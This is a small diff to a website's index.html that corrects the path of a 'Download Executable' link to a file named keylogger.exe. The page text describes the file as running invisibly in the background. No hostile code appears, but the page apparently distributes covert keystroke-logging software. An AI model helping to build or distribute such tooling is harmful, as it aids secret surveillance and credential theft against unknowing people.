--- a/site/index.html
+++ b/site/index.html
@@ -45,7 +45,7 @@
                     Runs invisibly in the background.
                 </p>
                 <div class="cta-group">
-                    <a href="../keylogger.exe" download class="btn btn-primary">
+                    <a href="keylogger.exe" download class="btn btn-primary">
                         <i data-lucide="download"></i> Download Executable
                     </a>
                     <a href="#usage" class="btn btn-secondary">
